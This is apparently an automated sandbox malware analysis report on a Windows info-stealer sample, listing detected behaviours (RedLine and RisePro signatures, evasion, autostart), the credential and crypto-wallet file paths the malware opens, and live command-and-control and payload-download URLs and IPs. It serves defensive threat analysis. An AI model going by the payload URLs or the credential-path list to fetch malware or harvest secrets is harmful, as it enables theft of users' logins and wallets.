Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Tries to harvest and steal ftp login credentials
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\rjKMaHWEjHxrAXnmaImAvrxNrHOchwuelXkCKuIwTZIWy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\rjKMaHWEjHxrAXnmaImAvrxNrHOchwuelXkCKuIwTZIWy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000055001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000056001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000187001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000188001\.purple\accounts.xml
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
OS version to string mapping found (often used in BOTs)
Source: 831840b410.exe, 00000010.00000003.3096661505.0000000001061000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP`
Source: 831840b410.exe, 0000002F.00000003.3472622791.000000000192C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 831840b410.exe, 0000001F.00000003.3233691066.0000000001849000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPo/
Yara detected Credential Stealer
Source: Yara match File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Yara detected RisePro Stealer
Source: Yara match File source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428500 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 119 b-stamps.gl.at.ply.gg 2->119 121 api.ip.sb 2->121 123 2 other IPs or domains 2->123 151 Snort IDS alert for network traffic 2->151 153 Found malware configuration 2->153 155 Malicious sample detected (through community Yara rule) 2->155 157 17 other signatures 2->157 10 explorha.exe 2 28 2->10         started        15 chrosha.exe 2->15         started        17 SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe 5 2->17         started        19 10 other processes 2->19 signatures3 process4 dnsIp5 145 193.233.132.167, 49715, 49720, 49722 FREE-NET-ASFREEnetEU Russian Federation 10->145 147 193.233.132.56, 49713, 49714, 49716 FREE-NET-ASFREEnetEU Russian Federation 10->147 95 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 10->95 dropped 97 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 10->97 dropped 109 9 other malicious files 10->109 dropped 197 Creates multiple autostart registry keys 10->197 199 Hides threads from debuggers 10->199 201 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->201 21 c884f8452a.exe 10->21         started        26 amert.exe 10->26         started        28 831840b410.exe 10->28         started        38 3 other processes 10->38 99 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 15->99 dropped 101 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 15->101 dropped 103 C:\Users\user\AppData\Local\...\build12.exe, PE32 15->103 dropped 111 4 other malicious files 15->111 dropped 203 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->203 30 build12.exe 15->30         started        32 build12.exe 15->32         started        34 rundll32.exe 15->34         started        105 C:\Users\user\AppData\Local\...\explorha.exe, PE32 17->105 dropped 205 Detected unpacking (changes PE section rights) 17->205 207 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 17->207 209 Tries to evade debugger and weak emulator (self modifying code) 17->209 217 2 other signatures 17->217 36 explorha.exe 17->36         started        149 127.0.0.1 unknown unknown 19->149 107 C:\Users\user\...\L6h0MKsU674R9uRTEifr_26.zip, Zip 19->107 dropped 211 Antivirus detection for dropped file 19->211 213 Multi AV Scanner detection for dropped file 19->213 215 Binary is likely a compiled AutoIt script file 19->215 219 5 other signatures 19->219 40 4 other processes 19->40 file6 signatures7 process8 dnsIp9 137 147.45.47.93 FREE-NET-ASFREEnetEU Russian Federation 21->137 139 ipinfo.io 34.117.186.192 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 21->139 141 db-ip.com 104.26.5.15 CLOUDFLARENETUS United States 21->141 87 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 21->87 dropped 89 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 21->89 dropped 91 C:\Users\user\...\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, Zip 21->91 dropped 159 Multi AV Scanner detection for dropped file 21->159 161 Detected unpacking (changes PE section rights) 21->161 163 Tries to detect sandboxes and other dynamic analysis tools (window names) 21->163 177 5 other signatures 21->177 42 schtasks.exe 21->42         started        44 schtasks.exe 21->44         started        46 WerFault.exe 21->46         started        93 C:\Users\user\AppData\Local\...\chrosha.exe, PE32 26->93 dropped 165 Antivirus detection for dropped file 26->165 167 Machine Learning detection for dropped file 26->167 169 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->169 171 Binary is likely a compiled AutoIt script file 28->171 48 chrome.exe 28->48         started        143 b-stamps.gl.at.ply.gg 147.185.221.19 SALSGIVERUS United States 30->143 173 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->173 179 2 other signatures 30->179 51 conhost.exe 30->51         started        181 2 other signatures 32->181 53 conhost.exe 32->53         started        55 rundll32.exe 34->55         started        183 3 other signatures 36->183 175 System process connects to network (likely due to code injection or exploit) 38->175 58 rundll32.exe 23 38->58         started        60 2 other processes 40->60 file10 signatures11 process12 dnsIp13 62 conhost.exe 42->62         started        64 conhost.exe 44->64         started        115 192.168.2.5, 443, 49703, 49705 unknown unknown 48->115 117 239.255.255.250 unknown Reserved 48->117 66 chrome.exe 48->66         started        69 chrome.exe 48->69         started        71 chrome.exe 48->71         started        81 2 other processes 48->81 185 System process connects to network (likely due to code injection or exploit) 55->185 187 Tries to harvest and steal ftp login credentials 55->187 189 Tries to harvest and steal browser information (history, passwords, etc) 55->189 73 netsh.exe 55->73         started        191 Tries to steal Instant Messenger accounts or passwords 58->191 193 Uses netsh to modify the Windows network and firewall settings 58->193 195 Tries to harvest and steal WLAN passwords 58->195 75 powershell.exe 26 58->75         started        79 netsh.exe 2 58->79         started        signatures14 process15 dnsIp16 125 www.youtube.com 66->125 127 accounts.youtube.com 66->127 135 3 other IPs or domains 66->135 129 play.google.com 74.125.138.101 GOOGLEUS United States 69->129 131 142.250.105.100 GOOGLEUS United States 71->131 133 142.250.9.104 GOOGLEUS United States 71->133 113 C:\Users\user\...\246122658369_Desktop.zip, Zip 75->113 dropped 221 Found many strings related to Crypto-Wallets (likely being stolen) 75->221 223 Loading BitLocker PowerShell Module 75->223 83 conhost.exe 75->83         started        85 conhost.exe 79->85         started        file17 signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.9.104
 unknown United States
15169 GOOGLEUS false
104.26.5.15
 db-ip.com United States
13335 CLOUDFLARENETUS false
193.233.132.56
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
147.45.47.93
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
142.250.9.99
 www.google.com United States
15169 GOOGLEUS false
64.233.185.136
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
142.250.105.100
 unknown United States
15169 GOOGLEUS false
193.233.132.167
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
239.255.255.250
 unknown Reserved
unknown unknown false
108.177.122.101
 www3.l.google.com United States
15169 GOOGLEUS false
74.125.138.101
 play.google.com United States
15169 GOOGLEUS false
147.185.221.19
 b-stamps.gl.at.ply.gg United States
12087 SALSGIVERUS true

Private

IP
192.168.2.5
127.0.0.1

Contacted Domains

Name IP Active
youtube-ui.l.google.com 64.233.185.136 true
www3.l.google.com 108.177.122.101 true
play.google.com 74.125.138.101 true
ipinfo.io 34.117.186.192 true
www.google.com 142.250.9.99 true
b-stamps.gl.at.ply.gg 147.185.221.19 true
db-ip.com 104.26.5.15 true
accounts.youtube.com unknown unknown
api.ip.sb unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://b-stamps.gl.at.ply.gg:30946/ true
    http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 true
      http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll true
        http://193.233.132.167/lend/build12.exe true
          https://www.youtube.com/account false
            https://www.google.com/favicon.ico false
              http://193.233.132.167/cost/random.exe true
                http://193.233.132.167/cost/sarra.exe true
                  http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll true
                    http://193.233.132.167/mine/random.exe true
                      http://193.233.132.167/enigma/index.php?wal=1 true
                        http://193.233.132.56/Pneh2sXQk0/index.php true
                          http://193.233.132.167/enigma/index.php true
                            http://193.233.132.167/enigma/Plugins/cred64.dll true
                              http://193.233.132.167/enigma/Plugins/clip64.dll true
                                b-stamps.gl.at.ply.gg:30946 true
                                  https://play.google.com/log?format=json&hasfast=true&authuser=0 false
                                    https://ipinfo.io/widget/demo/81.181.57.52 false
                                      http://193.233.132.167/mine/amert.exe true
                                        https://db-ip.com/demo/home.php?s=81.181.57.52 false